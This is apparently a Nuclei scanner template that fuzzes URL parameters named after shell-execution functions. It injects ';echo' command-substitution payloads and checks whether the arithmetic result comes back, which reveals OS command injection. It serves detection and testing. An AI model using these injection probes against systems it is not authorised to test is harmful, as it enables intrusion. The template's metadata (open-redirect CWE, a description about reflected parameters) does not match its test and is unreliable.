http:
- matchers:
  - status:
    - 200
    type: status
  - type: word
    words:
    - '[mci extensions]'
    - ADD-CMD100GAURAVGAURAV
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?curl=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&backtick_cmd=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&os_cmd=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&exec_cmd=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV'
  - '{{BaseURL}}?proc_open=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&popen=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&passthru=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&system_exec=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV'
id: 4rcepost-15-19
info:
  author: erickfernandox
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 4rcepost
  severity: medium
  tags: fuzzer, generic
